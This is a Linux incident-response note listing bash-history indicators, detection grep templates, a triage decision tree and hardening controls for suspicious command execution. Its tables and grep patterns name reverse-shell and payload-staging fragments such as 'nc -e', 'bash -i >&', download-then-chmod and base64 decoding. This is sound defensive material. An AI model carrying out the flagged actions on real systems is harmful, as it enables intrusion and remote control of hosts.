This note documents detection patterns related to suspicious command execution on Linux systems.
Direct Indicators
| Artifact | String / Signal | Detection Use | Forensic Value | Notes |
|---|
| bash history | curl http | Payload retrieval | Critical | Common staging |
| bash history | wget http | Remote download | Critical | Payload acquisition |
| bash history | chmod +x | Execution prep | High | Often follows download |
| bash history | ./payload | Local execution | Critical | Direct payload run |
| bash history | nc -e | Reverse shell | Critical | Classic shell launch |
| bash history | bash -i >& | Reverse shell | Critical | Common shell syntax |
| bash history | python -c | Inline payload | High | Interpreter abuse |
| bash history | perl -e | Inline payload | High | GTFOBIN pattern |
| bash history | socat | Tunnel or shell | High | Advanced operator usage |
| bash history | base64 -d | Payload decode | High | Obfuscation step |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|
| Download followed by execute | curl/wget then chmod/run | Critical | Classic intrusion flow |
| Encoded commands | base64 / hex decode | High | Obfuscation |
| Interpreter chain | python → bash → nc | Critical | Multi-stage payload |
| Temporary path execution | /tmp, /dev/shm | Critical | Adversary staging |
| Rare admin commands at odd times | Unexpected root actions | High | Suspicious operator behavior |
Common Tools
| Tool | Usage |
|---|
| curl | Payload retrieval |
| wget | Remote fetch |
| nc | Reverse shell |
| socat | Tunnel / shell |
| python | Inline execution |
| perl | Inline execution |
| bash | Reverse shell |
| openssl | Encoded payload handling |
Relevant Artifacts
/home/*/.bash_history/root/.bash_history/var/log/auth.logjournalctl/tmp/dev/shm- shell startup files
- downloaded payload files
MITRE ATT&CK References
- T1059 Command and Scripting Interpreter
- T1105 Ingress Tool Transfer
- T1059.004 Unix Shell
Decision Tree
- Was a suspicious command executed?
- Did it fetch external content?
- Did execution follow?
- Identify chmod / interpreter use.
- Pivot:
- downloaded file
- temp path
- outbound connection
- Confirm malicious chain
- reconstruct command sequence.
Example Detection Templates
Grep
grep -Ei "curl |wget |chmod \+x|nc -e|bash -i|python -c|perl -e|base64 -d|socat" /home/*/.bash_history /root/.bash_history 2>/dev/null
Journalctl
journalctl | grep -Ei "curl|wget|python|perl|bash|nc|socat"
Auth Correlation
grep "Accepted" /var/log/auth.log
Temp Execution
find /tmp /dev/shm -type f -executable 2>/dev/null
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|
| Auditd | Capture command execution | Critical | Independent evidence |
| Restrict outbound fetch tools | Limit curl/wget on servers | High | Reduces abuse |
| Temp execution controls | Mount noexec where possible | High | Blocks staging |
| Central logging | Preserve shell evidence | Critical | Supports timeline |
| Alerting | Detect suspicious command strings | High | Fast triage |
